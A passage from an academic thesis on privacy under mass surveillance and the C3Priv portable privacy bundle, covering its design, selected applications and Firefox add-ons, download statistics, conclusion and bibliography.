291 U.S. 97, 105 (1934) https://supreme.justia.com/cases/federal/us/291/97/case.html#105}]
CHAPTER 4. PRIVACY IN HOSTILE ENVIRONMENTS 16
4.2 Mass surveillance
In Europe, presumption of innocence is a right protected by the Universal Declaration of Human
Rights and by the Convention for the Protection of Human Rights and Fundamental Freedoms
of the Council of Europe. Formally, presumption of innocence means that the burden of proof is
on the accuser, not on the defendant. At this point, the right to presumption of innocence is
being infringed upon in important ways, mostly due to mass surveillance and the illegal seizure
of personal information.
If we look hard enough at an individual citizen, it is very likely that he broke the law in
some way, knowing or unknowingly, but not with criminal intent. In most countries where
presumption of innocence is considered a right, prosecuting a citizen would require a strong
suspicion, followed by the gathering of proof. Depending of the nature of the proof, and the
strength of the accusation, a judge may have to authorize such gathering. In countries with
mass surveillance, however, every citizen is treated as a possible suspect, and evidence collection
is permanent and unfiltered. It is possible for the authorities in such a country to single out
an individual and check his records for activity that can be used to initiate prosecution. The
analysis of this information can even be automated, so that the prosecution may start without
human intervention or judgment.
Although frowned upon in liberal democracies, mechanisms of mass surveillance have been
tolerated, and sometimes accepted, by the public as a necessary evil. However, no western
government has been able to produce evidence of the necessity of such programs, despite the
pressure to do so. The popular claim recently made by the USA that 54 terrorist attacks had
been stopped by their contested mass surveillance program was found untrue by two independent
White House reviews of the relevant classified data.[45][31]
Paired with this fact, the disclosure of classified information about secret programs developed
in the USA and Europe has shown the depth to which innocent citizens life’s are being scrutinized
and intruded upon by this ruthless mechanisms of bulk data collection.
The ubiquity of electronic personal devices, many of them with significant data storage
capabilities, adds to the problem, since the amount of personal and private information that can
currently be seized in the event of a legitimate body search is enormous. Because this devices
have only recently become widely available, their seizure, together with the data they contain,
is not bounded by law. This allows the authorities to apprehend cellphones, hand-held GPSs,
digital storage devices, and cards containing biometric data, most notably The possibilities
created by the massive collection of this sort of data are very relevant to the health of democracy
in western states, but they become particularly dangerous if a government or a law enforcement
agency chooses to abandon the principles that it is expected to follow, a situation not altogether
uncommon in very recent or unstable democracies, in dictatorships or in police states.
CHAPTER 4. PRIVACY IN HOSTILE ENVIRONMENTS 17
4.3 Privacy and technology
Throughout the history of privacy, there are two main facts that come to light: One is that there
is an omnipresent temptation for political, economical or military powers to exploit the lack of
privacy regulations for profit or for legal advantage; The other is that the lack of regulations
protecting privacy is always present when new technologies emerge.
In the late years of the past century and through past decade, technology surfaced and
became widely available at a pace that had not been seen before. Internet access has led a
significant layer of the population to rely heavily on online services, putting a huge amount of
trust in the availability and integrity of those services and their underlying technology.
Due both to the popularity and ubiquitous need for Internet access, a vast array of terminals
have been developed, as diverse as smartphones, tablets or wristwatches. In general, they are
so complex that their core is opaque to most users, even to those that know in detail one of its
many components.
Although they could have done otherwise, and perhaps to their own benefit, companies and
brands have made no effort to create and adopt clear standards, or to educate users. Obscure
concepts such as “Cloud Services”, or the “Internet of Things”, are used to lead the public to
wrongly infer that the complex, intermediary ridden network their data and meta-data has to
cross, is a simple, vague and secure place, that they need not know or care about. With no
incentive to learn and no perception of the increasing gap between user and device, the population
in general is acquiring no significant knowledge on the inner workings of services, the hardware
they use, or the channels they use to reach them.
To combat this, there has to be a significant investment in educating users, and in establishing
rules for transparency in the design of software and hardware that needs to be trusted. New
technologies will have to be created according to a principle of “privacy by design”.
Chapter 5
Easy to use Privacy: C3Priv
As public awareness on the topics of online privacy and data security increases, there is also
an increasing need to provide adequate tools for enhancing safety in the use of networks and
terminals. To address this issue, a project was developed in the context of the present work,
in conjunction with the C3P from Universidade do Porto (UP), and the Comissão Nacional de
Protecção de Dados (CNPD). The project, named C3Priv, aims to develop a tool to return to
the user the ability to take control over his own privacy. In the following chapter we expose the
challenges faced while designing a solution, and describe how we surpassed those challenges.
5.1 Guiding premises
C3Priv starts with the premise that the biggest risks for users arise from the lack of control they
have over the software they use. Frequently browsers, websites and applications store personal
data and sensitive information without the awareness or permission of the user. When this occurs
in an uncontrolled environment the risk multiplies, and it is almost certain that privacy - and
even safety - of the user is compromised.
Our goal is to allow users to reduce their “online footprint”, allowing them to have a safer online
experience independently of their computer know-how and their ability to correctly configure
complex software. Organizations and projects like the Electronic Frontier Foundation[14], the
Open Rights Group[5], the American Civil Liberties Union[42], or the TOR Project[36] exist, but
their aim is directed either at educating users, appealing to major online websites and companies
to become accountable and ethical in their data collection, cover anonymity needs, or pushing
for stricter rules to regulate abusive data collection. Unlike this projects, C3Priv starts with
the conservative view that every computer used and every site visited is hostile, unless the user
explicitly says otherwise. We change the focus to the user, giving him the responsibility and the
choice to protect himself.
In order to ensure the users will adhere to this new paradigm of taking control over their
18
CHAPTER 5. EASY TO USE PRIVACY: C3PRIV 19
own “online footprint”, any solution has to do more than giving them the tools to keep them
safe. We therefore opted by a design directed towards solving the users needs, offering them
applications that are easy to use, with an easy learning curve, and that ultimately do address
their day-to-day needs with no additional burden.
Ultimately, the purpose of C3Priv is to return control to the user, allowing him to choose
what he sees, when he sees it, what he keeps to the future, who can track him, and for how long.
5.2 Privacy By Default
Observing users needs, a common challenge seems to be keeping files and configurations
synchronized between computers. Between the workplace and home, users often need to copy
files and bookmarks to keep them updated, or to write down passwords in order to use the same
services from everywhere. This procedures are both ponderous and risky. Recent files may be
overwritten by older versions, passwords and documents may be misplaced, lost or even captured
by an hostile party.
Although there is a growing concern of the public and the media over security topics, close
observation also shows that a large base of concerned users is not computer savvy, and is both
unable to choose appropriate software, and to correctly configure it on their own. Software
wrongly configured or obtained online from disputable sources can be as much or even more
dangerous that having no protection at all.
From this observations, it becomes clear that a useful solution has to integrate software equal
or very similar to the one the user already works with, in a format that he can carry with him.
This solution must also be bundled in a way that allows for easy deployment, and can be used
successfully with default configurations by users with very little computer experience.
5.3 Recognizing Limits
When building a solution that is, ultimately, a “best effort” approach to protect users, it is
crucial to identify threats, and to establish limits beyond our ability to counteract.
Without considering the good sense and the computer literacy of the user, the protection we
can afford will ultimately depend on the scope and the power of the intercepting party, which we
will call adversary.
It is a well known rule of cybersecurity that no system is secure unless it is offline and
physically isolated. To us, this means there are concerns we must choose to leave behind. Chief
among them, is the possibility of the physical capture of data or storage devices, by legal means
or by force, as well as the coercion of the user to reveal whichever data he aims to keep secret. At
best, this could be approached by building a system that supports plausible deniability. However,
CHAPTER 5. EASY TO USE PRIVACY: C3PRIV 20
besides the increased complexity of the design restrains, such mechanism could be a hindrance to
the common user unless seamlessly done, and is likely beyond the needs of the targeted audience.
When talking about securing data that transverses a network, it is also important to establish
who owns that network, and the level of control the owners have over it. As such, an adversary
that owns either both ends, or a sufficiently large number of nodes in the network, will be able
to time connections and gather large amounts of information. This may allow him to correlate
separate communications, possibly identifying users and patterns of behavior and link together
different sessions done by the same user, both in the same and in different services. Among many
others, with control of middle nodes the adversary can manipulate or redirect the connection,
conducting effective phishing or man-in-the-middle attacks. This situation becomes especially
severe if the adversary also has control over a relevant certificate authority, allowing him to create
false secure connections and to easily hijack secure communications. Ultimately, a powerful
adversary could in extreme cases block all HTTPS traffic, so that the communications done
could be intercepted unencrypted, or even block all communication. Actual examples of this
occurrences where seen in countries such as Syria, Iran and China, where the victims of the
attacks ranged from activists, to journalists, to civilians opposed to the regime. For the time
being, and to limit the complexity of the project, this groups of users will be left out of our
target public.
5.4 Proposed Solution
With this considerations in mind, we are able to narrow down a group of users that is more likely
to benefit from a solution such as C3Priv. These are users that have little computer literacy
but use computers and the Internet in a day-to-day basis. To give these users a swiss-knife of
applications they can recognize and actively use in both at home and in less secure environments,
Portable Apps was chosen as the base for the software bundle. As mentioned on their website,
PortableApps is a fully open source and free platform that works in any portable storage device,
and can be installed and run locally.
With millions of users worldwide, and online since 2004, PortableApps has established itself
as a trusted platform, and has a large collection of open-source, freeware and commercial software
easily available. PortableApps is highly customizable and flexible, allowing the user to pick
between a vast array of portable applications from a built in store, that can be regularly updated
with no more that a click. A set of customizable menus can be organized in the most convenient
way, and the application can be configured to run selected portable apps every time the menu
opens.
Portable applications have the functionality of the installed versions, but where adapted
so that all files and data needed by the program is kept in sub-folders of the program’s main
folder. The PortableApps software can be installed in a portable device, such as a USB pen-drive,
together with the selected applications. When the user plugs the pen-drive in any Personal
CHAPTER 5. EASY TO USE PRIVACY: C3PRIV 21
Figure 5.1: PortableApps menu
Computer (PC), he can use those applications without having to install them locally.
All the files are saved to the drive, instead of the PC. Therefore, the user has always with
him the files he needs, as well as his usual programs, configured according to his preferences and
needs. From a privacy-preserving point-of-view, this solution has the significant advantage of
reducing to the minimum necessary the information left in the PC used, reducing the risk of the
user inadvertently leaving private data in the wrong hands.
Together with this software, the C3Priv bundle will also include two browsers, one with
add-ons specifically chosen for enhanced privacy and security, and another, the TOR Project
bundle, which addresses user anonymity and is left unaltered. Encryption software will also be
included, together with an encrypted folder that can be used as a “safe” folder for important
files. The full contents of the C3Priv bundle, already installed to a USB usb-pendrive, can be
seen bellow.
CHAPTER 5. EASY TO USE PRIVACY: C3PRIV 22
Figure 5.2: Contents of a USB pen-drive with C3Priv already installed
5.5 Advantages of Open Source
Besides PortableApps itself being open-source, all programs selected to be in the C3Priv bundle
by default are open source.
Compared to freeware or paid proprietary software, whose source code is not disclosed, the
code from open source software is easily available, and can be read and analyzed by any user
that wishes to do so. Due to the popularity and widespread use of these particular applications,
the source code is reviewed by a large amount of people, from all over the world. This gives us a
greater trust in the software we include in the bundle, since it is unlikely that any purposely
placed exploit or “back-door” would pass unnoticed to the eyes of so many independent and
diversely motivated users.
5.6 Selected Applications
C3Priv contains a small set of applications selected for their usefulness to the majority of our
target users. This includes programs such as office software to edit documents and spreadsheets,
CHAPTER 5. EASY TO USE PRIVACY: C3PRIV 23
an audio player, an anti-virus, an application to compress and decompress files, an image editor,
an e-mail client, programs for secure remote access, an Instant Messaging client, and a browser.
Users can add software they find useful through the PortableApps available software menu,
including proprietary software, if they choose to. A full list of the software included is present in
Annex A.
5.7 Selected Browser Add-ons
Add-ons are small pieces of optional software that add to a programs functionality. To address
privacy and online safety concerns we included in the Firefox browser present in C3Priv a set of
relevant add-ons, already configured to offer maximum protection. This includes a vast array of
add-ons that range from blocking online tracking, cookies, dangerous scripts, flash animations,
pop-ups or invasive advertisement, to verifying a secure connection, or a website’s reputation. A
full list of the add-ons included is present in Annex B.
5.8 Observations and Results
The first public release of C3Priv happened in the 11th of February 2014, in celebration of
the Safer Internet Day, through the CNPD website[11]. Since then, it has been available for
download in it’s own webpage[9]. It received a significant amount of attention by the press, and
the C3Priv bundle available online had over 8.000 downloads during the first month. We retained
some of the download’s metadata, in order to map the geographical areas that showed interest in
C3Priv. As the graphics displayed below show, the vast majority of downloads was made from
Portugal. After Portugal, the largest number of downloads in Europe came from France and
from the United Kingdom. Some interesting results show a large number of downloads in areas
such as Brazil (in particular in the north and in the western frontier with Bolivia), Morocco,
Angola, and South Korea.
The large number of downloads from Brazil and Angola may be a result of the shared cultural
and linguistic legacy, and possibly due to the significant presence of Portuguese citizens living in
those countries. Downloads from South Korea and Morrocco are, however, harder to explain, and
may be related to the awareness about privacy and freedom of speech that the recent political
turmoil both in North African countries and in North Korea has created. Unfortunately, there
is not enough data to allow us to retrieve further conclusions. Mehcanisms for retrieving more
information can be found in the proposals for future work.
CHAPTER 5. EASY TO USE PRIVACY: C3PRIV 24
Figure 5.3: Volume of C3Priv downloads from February 2014 to October 2014
Figure 5.4: C3Priv download distribution globally
CHAPTER 5. EASY TO USE PRIVACY: C3PRIV 25
Figure 5.5: C3Priv download distribution in Europe
5.9 Future
During the creation of C3Priv and the analysis of results, we perceived a large space for
improvement on the existing technologies that address user privacy and security. The interest
demonstrated by the public in our project, both through the press and through the individual
C3Priv downloads, leads us to believe that the development and evolution of C3Priv must
continue. The lines of work that appear particularly relevant for the time being are explained
bellow.
5.9.1 Creating an indistinguishable online identity
Research has shown that the use of specific options to avoid online tracking and protect user
data may actually make the user more visible to an observer looking for distinguishing profiles.
In fact, to be anonymous in a crowd, the user has to mingle with it, becoming unidentifiable
within that anonymity set. This can only be done when a significant number of individuals in
the crowd have very similar profiles. To this end, using a large number of security plug-ins, or
disabling common features of the browser, such as Javascript or Flash, can have a detrimental
effect for the user.[53][48]
Although C3Priv could create an anonymity set on its own, making all of its users indistin-
guishable from each other, our users are not enough to achieve that at this point. Therefore, a
useful approach would be to keep updated records of the most common browser settings, and
apply them to the C3Priv browser automatically. Since this extra anonymity could come at the
cost of a lever of privacy or protection, each configuration would have to be carefully evaluated
to assess its impact. A possible solution to this dilemma would be to provide different bundles,
CHAPTER 5. EASY TO USE PRIVACY: C3PRIV 26
allowing the user to chose the one he finds more adequate to address his needs. This bundles
should then be tested for uniqueness using tools such as Panopticlick, a website created by the
Electronic Frontier Foundation to evaluate how singular is a certain browser fingerprint.[28]
5.9.2 Surveying users needs
To establish the needs and the level of satisfaction users have with C3Priv, a small survey could
be done on the website, or a feedback tool could be included in the software. This could allow
the users to express their preferences about the usability of C3Priv, the applications they wish to
see included in future editions, and possible problems and bugs they may encounter during use.
Chapter 6
Conclusion
During this thesis we examined several scenarios where privacy, anonimity or secrecy are needed
in communications but dificult to achieve. We did research on existing solutions to mitigate the
dificulty in controling and securing a working environment for entities with diferent needs and
motivations, from the exchange of classified information by governent officials, to the need for
privacy of the common citizen.
In the realm of classified communications, together with the C3P team, we examined a
mobile application that is commercially available for design flaws. We described the flaws found
and detailed how they could be exploited, showing that the communications done through the
application where not secure. We implemented software to exploit one of those design flaws.
However, due to problems with the initial solution of adapting an existing program, we had
to develop new software for our distributed worker nodes. The problems found delayed the
implementation of the software, resulting in an unstable program that still needs debugging and
testing before it can produce reliable results.
The generalization of our observations about the examined application to other similar apps
is limited by the lack of an exaustive analysis of commercial software for secure communications.
However, the fact that such critical design flaws where found in an application meant for secure
communications at the highest level, makes us reasonably suspicious that applications with the
same, or higher, level of oversight may be available commercially, especially among those marketed
for secure communications for businesses or individuals. Our findings prove alarming enough to
instigate more caution and stricter rules in the selection of software for secure communications,
and underline the need for rigourous security audits when high levels of security are required.
On the field of online privacy, the focus of this work was the every day activity of a common
individual. We started by studying the evolution of the concept of privacy and the way it has
been infriged upon with the aid of new technology, from the dissemination of street photography
to bulk data collection. We’ve shown that the discussion on the concept of privacy and the
need to frame it in legal terms has remained subject of debate to the present day. With courts
avoiding the application of Harlan’s test, both due to the difficulty of assessing the public’s
27
CHAPTER 6. CONCLUSION 28
expectations towards privacy, and to the complexity of the technology involved in the current
methods of information gathering, we concluded that there is an urgent need to provide a clear
and resilient definition of privacy, together with a set of rules and guidelines that can effectivelly
protect citizens in from the threats of existing and future technology.[49]
In paralel with the struggle to create mechanisms to protect citizens, we searched for a solution
for the lack of control that users experience over their online footprint. We developed C3Priv, a
solution that could return a measure of control to the user, by allowing it to use computers that
he does not trust without leaving any significant information behind. The tool includes a version
of the popular Firefox browser, costumized to minimize as much as possible the information that
is collected by websites during regular Internet use. By tracking the number of downloads of
C3Priv and their distribution throughout the globe, we where able to verify that the interest in
the tool spreads beyond Portuguese speaking contries, indicating that internationalizing the tool
may be a possible direction for future development. Other future improvements can be made as
the weaknesses identified in the tool are adressed and fixed.
In the research done for the present work, it has been a fact that the average computer or
smartphone user, or the average netizen, is vulnerable to the technology he does not understand.
Because users in this group are very numerous, and the most vulnerable to scams and online
attacks, we believe that the most important achievement in this work was the creation of a tool
that takes the burden of correct configuration and deep technological knowledge from the user.
Although there is ample room for improvement, C3Priv is a unique tool, and it is ready to fulfill
its purpose, contributing towards a user experience that is safe by default.
Annex A - Portable Applications
7-Zip This application is popular file compressor. It allows the creation of archives with the
following compression formats:7z, ZIP, GZIP, BZIP2, TAR, RAR, among others.[1]
ClamWin This application is a free anti-virus for Microsoft windows. It boasts high levels of
detection of virus and spyware and is constantly being updated. The portable version does
not allow for automatic updates, and file verification must be made manually by the user.
[10]
Evince Evince is a PDF, DJVU, TIFF and DVI reader. More information at: [15]
GIMP The GNU Image Manipulation Program is a complete image editor. It contains all the
basic functionality if an image editor, allowing advanced users tools for professional photo
editing or illustration creation. [21]
KeePass This application is a password manager that allows the user to save in a secure manner
all his passwords. The passwords are retrieved and stored in a secure database. The user
only needs to remember one password, that will work as a master key, allowing the access
to the full database. [22]
KiTTY This is a telnet and ssh client for windows, that allows to connect in a secure manner
to remote systems. [23]
Libre Office This is an office suite of programs with full compatibility with the Microsoft
products and others (Lotus, Word perfect and similar apps).[24]
MicroSIP This applications allow the user to make VoIP calls of high quality, using the SIP
protocol. [25]
Mozilla Firefox This is one of the most known web browsers, boasting several security
enhancements that secure the privacy of the users. The portable version does not let
any personal information on the computer that is used, allowing complete privacy. [16]
Mozilla Thunderbird The Mozilla Thunderbird application is an electronic mail client, secure
and easy to use. It allows IMAP/POP and RSS. The portable version leaves no trace in
the computer where it is used, allowing the transportation and secure access to e-mails
and contacts.[34]
29
CHAPTER 6. CONCLUSION 30
openVPN This application allows the creation of connections through encrypted tunnels,
allowing the access to remote resources in a secure manner.[27]
Pidgin Portable This is an application that allows the exchange of instant messages. It has
support for the protocols used by AOL, ICQ, MSN, YAHOO among others. All the
definitions and contacts are private and no information is retained on the used machine.
The available plugins can be easily added to allow for message encryption. [30]
Songbird This is an audio player with MP3, FLAC, Vorbis, and WMA support.[33]
VLC This is a multimedia player that supports several video and audio formats. [38]
WinSCP This applications is a SFTP and FTP client for Windows and allows for a secure way
to copy files to/from a remote location to the local machine.[40]
WinWGET This application is a download manager based on wget.[41]
Tor Bundle This package includes a modified Firefox version to use with the Tor network,
allowing anonymous access to the internet.[36]
Annex B - Firefox Add-Ons
Adblock Plus Adblock Plus uses several filters to remove online advertising and block sites
containing malware. [6]
BetterPrivacy Protects the user against “super” cookies. This new generation of cookies allow
the profiling of the user behavior on the web. This information is easily accessible by
marketing companies. This add-on was created to alert the users to the hidden objects
that never expire, and allow for a easier visualization and management of them as the
automatic methods of control are not reliable. [7]
Bloody Vikings! This add-on simplifies the use of temporary e-mail addresses. It allows for
the user to remain anonymous and at the same time protects his real address from SPAM.
More information available at [8]
Do Not Track Me Every time we browse on the web, companies, marketing agents and social
networks collect information about the users. Everything one reads, clicks and buys is
being recorded and stored. The DoNotTrackMe plugin stops this unwanted profiling. [12]
DuckDuckGo Plus DuckDuckGo can be added as the default search engine for the address
and search bar.[13]
Flagfox Among other advanced functionality, Flagfox shows on the address bar the flag
corresponding to the country that is currently serving the webpage.[17]
FlashBlock Flashblock blocks all the Flash content in a webpage and adds a button that gives
the user the option to download and run that content. It blocks content from Macromedia
Flash, Macromedia Shockwave e Macromedia Authorware.[18]
Force TLS This add-on replaces insecure HTTP connections for HTTPS (secure HTTP)
whenever a server supports it.[19]
Ghostery This add-on detects trackers, beacons and other tools used by publicity and marketing
companies to follow the behavior of users online, allowing the user to deactivate them.[20]
NoScript Security Suite This suit guarantees that Javascript, Java and other scripts and
programs are only executed if they come from safe domains, chosen by the user. This
allows for protection against some common web attacks.[26]
31
CHAPTER 6. CONCLUSION 32
Perspectives This add-on creates an identity database, using information gathered from
different places on the internet. Every time a user accesses a secure site, this extra
compares the site’s certificate with the information it has collected in its database, alerting
if any discrepancy is detected.[29]
Self Destructing Cookies This extra deletes the cookies and local cache as soon as the browser
tab that created them is closed.[32]
Toggle Javascript This add-on adds a button to the tool bar that allows the user to switch
Javascript on/off in a quick manner.[35]
Web Of Trust This extra shows a site’s reputation, by displaying a traffic light next to each
result from a search engine. The symbol is also visible in links from sites like Facebook,
Twitter, Gmail, Wikipedia, among others. A green light means that the users classified the
site as being trustful, a yellow or red one alerts for potential danger.[39]
Acronyms
3G Third Generation
4G Fourth Generation
GSM Global System for Mobile
Communications
SMS Short Message System
AP Access Point
SD Secure Digital
ISP Internet Service Provider
RFC Request For Comments
PRF Pseudorandom Function
ASCII American Standard Code for
Information Interchange
CPU Central Processing Unit
SSH Secure Shell
PC Personal Computer
USB Universal Serial Bus
HTTP Hypertext Transfer Protocol
IP Internet Protocol
OS Operating System
AES Advanced Encryption Standard
CCMP Counter Mode Cipher Block
Chaining Message Authentication
Code Protocol
ECB Electronic Codebook
HMAC Hash-based Message
Authentication Code
IV Initialization Vector
PBKDF2 Password-Based Key Derivation
Function 2
PIN Personal Identification Number
PKCS Public Key Cryptography
Standard
PSK Pre-Shared Key
SHA Secure Hash Algorithm
SHA1 Secure Hash Algorithm 1
SHA3 Secure Hash Algorithm 3
SSID Service Set Identifier
TKIP Temporal Key Integrity Protocol
WPA Wireless Protected Access
WPA1 Wireless Protected Access 1
WPA2 Wireless Protected Access 2
WEP Wired Equivalent Privacy
RADIUS Remote Authentication Dial In
User Service
PMK Pairwise Master Key
USA United States of America
US United States
33
Acronyms 34
UP Universidade do Porto
CNPD Comissão Nacional de Protecção
de Dados
C3P Centro de Competências em
Cibersegurança e Privacidade
NIST National Institute of Standards
and Technology
NSA National Security Agency
Bibliography
[1] 7-zip. Online. URL http://www.7-zip.org/. Last accessed: January 20, 2015.
[2] Java platform, standard edition 7 - api specification - class cipher. Online. URL http:
//docs.oracle.com/javase/7/docs/api/javax/crypto/Cipher.html. Last accessed: January 20,
2015.
[3] Katz v. united states, 389 u.s. 347, (9th cir. 1967). Online. URL https://supreme.justia.
com/cases/federal/us/389/347/case.html. Last accessed: January 20, 2015.
[4] Olmstead v. united states, 277 u.s. 438, (9th cir. 1928). Online. URL https://supreme.justia.
com/cases/federal/us/277/438/case.html. Last accessed: January 20, 2015.
[5] Open rights group. Online. URL https://www.openrightsgroup.org/. Last accessed: January
20, 2015.
[6] Adblock plus. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/adblock-plus/.
Last accessed: January 20, 2015.
[7] Better privacy. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/
betterprivacy/. Last accessed: January 20, 2015.
[8] Bloody vikings! Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/bloody-
vikings/. Last accessed: January 20, 2015.
[9] C3priv. Online. URL http://www.c3p.up.pt/c3priv/. Last accessed: January 20, 2015.
[10] Clamwin. Online. URL http://www.clamav.net/. Last accessed: January 20, 2015.
[11] Comissão nacional de protecção de dados. Online. URL http://www.cnpd.pt/. Last
accessed: January 20, 2015.
[12] Do not track plus. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/
donottrackplus/. Last accessed: January 20, 2015.
[13] Duck duck go for firefox. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/
duckduckgo-for-firefox. Last accessed: January 20, 2015.
[14] Electronic frontier foundation. Online. URL https://www.eff.org/. Last accessed: January
20, 2015.
35
BIBLIOGRAPHY 36
[15] Evince. Online. URL http://projects.gnome.org/evince/. Last accessed: January 20, 2015.
[16] Mozilla firefox. Online. URL http://www.mozilla.com/firefox/. Last accessed: January 20,
2015.
[17] Flagfox. Online, . URL https://addons.mozilla.org/pt-PT/firefox/addon/flagfox. Last
accessed: January 20, 2015.
[18] Flash block. Online, . URL https://addons.mozilla.org/pt-PT/firefox/addon/flashblock/.
Last accessed: January 20, 2015.
[19] Force tls. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/force-tls. Last
accessed: January 20, 2015.
[20] Ghostery. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/ghostery/. Last
accessed: January 20, 2015.
[21] Gimp. Online. URL http://www.gimp.org/about/introduction.html. Last accessed: January
20, 2015.
[22] Keepass. Online. URL http://keepass.info/. Last accessed: January 20, 2015.
[23] Kitty. Online. URL emhttp://kitty.9bis.com/. Last accessed: January 20, 2015.
[24] Libreoffice. Online. URL https://www.libreoffice.org/. Last accessed: January 20, 2015.
[25] Microsip. Online. URL http://microsip.org.ua/. Last accessed: January 20, 2015.
[26] Noscript. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/noscript. Last
accessed: January 20, 2015.
[27] Openvpn. Online. URL http://sourceforge.net/projects/openvpn/. Last accessed: January
20, 2015.
[28] Panopticlick. Online. URL https://panopticlick.eff.org/index.php?action=log&js=yes. Last
accessed: January 20, 2015.
[29] Perspectives. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/perspectives.
Last accessed: January 20, 2015.
[30] Off-the-record messaging. Online. URL https://otr.cypherpunks.ca/. Last accessed: January
20, 2015.
[31] Nsa slides explain the prism data-collection program. Online. URL http://www.
washingtonpost.com/wp-srv/special/politics/prism-collection-documents/. Last accessed:
January 20, 2015.
[32] Self-destructing cookies. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/self-
destructing-cookies. Last accessed: January 20, 2015.
BIBLIOGRAPHY 37
[33] Songbird. Online. URL http://getsongbird.com/. Last accessed: January 20, 2015.
[34] Mozilla thunderbird. Online. URL http://www.mozilla.com/thunderbird/. Last accessed:
January 20, 2015.
[35] Toggle javascript. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/togglejs.
Last accessed: January 20, 2015.
[36] Tor project. Online. URL https://www.torproject.org/. Last accessed: January 20, 2015.
[37] Crypto museum. Online. URL http://www.cryptomuseum.com/crypto/vernam.htm. Last
accessed: January 20, 2015.
[38] Vlc. Online. URL http://www.videolan.org/vlc/. Last accessed: January 20, 2015.
[39] Web of trust. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/wot-safe-
browsing-tool. Last accessed: January 20, 2015.
[40] Winscp. Online, . URL http://winscp.net/. Last accessed: January 20, 2015.
[41] Winwget. Online, . URL http://www.cybershade.us/winwget/. Last accessed: January 20,
2015.
[42] Complaint for declaratory and injunctive relief ("nsa spying complaint"), aclu v. nsa. Online,
January 2006. URL https://www.aclu.org/national-security/nsa-spying-complaint#attach.
Last accessed: January 20, 2015.
[43] Nist’s policy on hash functions. Online, September 2012. URL http://csrc.nist.gov/groups/
ST/hash/policy.html. Last accessed: January 20, 2015.
[44] Sha1 deprecation policy. Online, Novembro 2013. URL http://blogs.technet.com/b/pki/
archive/2013/11/12/sha1-deprecation-policy.aspx. Last accessed: January 20, 2015.
[45] Privacy and civil liberties oversight board report on the surveillance program oper-
ated pursuant to section 702 of the foreign intelligence surveillance act, July 2014.
URL http://www.wired.com/wp-content/uploads/2014/07/PCLOB-Section-702-Report-
PRE-RELEASE.pdf.
[46] Google’s sha-1 deprecation plan for chrome. Online, September 2014. URL http://
www.symantec.com/connect/blogs/google-s-sha-1-deprecation-plan-chrome. Last accessed:
January 20, 2015.
[47] Phasing out certificates with sha-1 based signature algorithms. Online, September
2014. URL https://blog.mozilla.org/security/2014/09/23/phasing-out-certificates-with-
sha-1-based-signature-algorithms/. Last accessed: January 20, 2015.
[48] Peter Eckersley. How unique is your web browser? URL https://panopticlick.eff.org/browser-
uniqueness.pdf. Last accessed: January 20, 2015.
BIBLIOGRAPHY 38
[49] Susan Freiwald. First principles of communications privacy. Stanford Technology Law Review,
2007.
[50] B. Kaliski. Pkcs #5: Password-based cryptography specification version 2.0, rfc 2898. Online,
September 2000. URL https://tools.ietf.org/html/rfc2898#page-6. Last accessed: January
20, 2015.
[51] William Burr Meltem Sönmez Turan, Elaine Barker and Lily Chen. Recommendation
for password-based key derivation part 1: Storage applications. Online, December 2010.
URL http://csrc.nist.gov/publications/nistpubs/800-132/nist-sp800-132.pdf. Last accessed:
January 20, 2015.
[52] Yael Onn, Michael Geva, Yaniv Druckman, Ariel Zyssman, Rom Timor, Inbal Lev, Arz
Maroun, Tamar Maron, Yossi Nachmani, Yaniv Simsolo, Saar Sicklai, Adi Fuches, Maor
Fishman, Shai Packer, and Lotem Pery. Privacy in the digital environment. Haifa Center
of Law & Technology, 2005. ISBN 965-90924-1-5.
[53] Mike Perry. [tor-talk] tor browser disabling javascript anonymity set reduction. Online, May
2012. URL https://lists.torproject.org/pipermail/tor-talk/2012-May/024227.html. Last
accessed: January 20, 2015.
[54] A. Shamir R.L. Rivest and L. Adleman. A method for obtaining digital signatures and
public-key cryptosystems. Communications of the ACM, Volume 21 Issue 2, 1978.
[55] Arpit Sud Rodney Beede, Ryan Kroiss. Distributed wpa cracking. Online. URL https:
//code.google.com/p/distributed-wpa-cracking/wiki/WelcomePage. Last accessed: January
20, 2015.
[56] Warren and Brandeis. The Right to Privacy. Online, 1890. URL http://groups.csail.mit.
edu/mac/classes/6.805/articles/privacy/Privacy_brand_warr2.html.
[57] Joshua Wright. Cowpatty. Online. URL http://www.willhackforsushi.com/?page_id=50.
Last accessed: January 20, 2015.